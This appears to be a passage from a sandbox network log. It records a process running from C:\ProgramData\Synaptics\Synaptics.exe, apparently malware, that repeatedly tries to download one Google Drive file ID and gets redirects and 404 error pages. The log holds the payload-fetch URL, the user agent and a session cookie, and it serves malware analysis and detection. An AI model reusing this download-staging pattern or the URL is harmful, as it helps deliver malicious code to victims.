                                                                                                                              2024-12-30 10:48:36 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:37 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC5SlqEXPGMQdLzOQ5vYeoe5rffw95IvpX6we9hvig-FjAyeUlhL4Jf3rrv4mHpDc9EL
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:37 GMT
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-wI_O-LoClKzt_-3tXztISw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:37 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:37 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 6a 59 39 69 6e 4c 62 49 53 39 54 34 6d 55 33 55 76 4b 36 78 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="KjY9inLbIS9T4mU3UvK6xg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:37 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              125192.168.2.449993142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:37 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:37 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-FVM7Fawv7ux6a8RmnkWKsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              126192.168.2.449994142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:37 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:37 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC5Sb546Q_lxpw09JndWOIpI7YPaebkuOmjt2xOFAE4emIYbtdeAsvMCcGM7vmeUaoHlSIb8N6E
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:37 GMT
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-T6xL55gO6AiPAlGPcVIzqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:37 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:37 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 56 7a 33 69 65 39 74 54 36 6e 6d 58 37 38 47 72 6c 5f 73 73 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="IVz3ie9tT6nmX78Grl_ssg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:37 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              127192.168.2.450003142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:38 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:38 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Kv5isVkTIb1ZrlG0AvnYSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              128192.168.2.450002142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:38 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:38 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-DY-0uMvwRjM1dpRmt8Jw0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              129192.168.2.450005142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:38 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC5zOrhhOsNUov_iHNNEHJt7p2zGy7B_JWXhi6-JnIaAigabRNuJt1FKBfEL3X5B8OoMmipF6us
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:38 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-6D1RH_hFPnzqPqWHy6OpCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:38 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:38 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 49 55 65 56 53 55 54 7a 37 52 4a 5f 67 65 6a 47 34 46 47 38 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="tIUeVSUTz7RJ_gejG4FG8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:38 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              130192.168.2.450004142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              131192.168.2.450019142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:40 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:40 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-2KpmJLSGL9Z0tAscIRS-wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              132192.168.2.450020142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:40 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
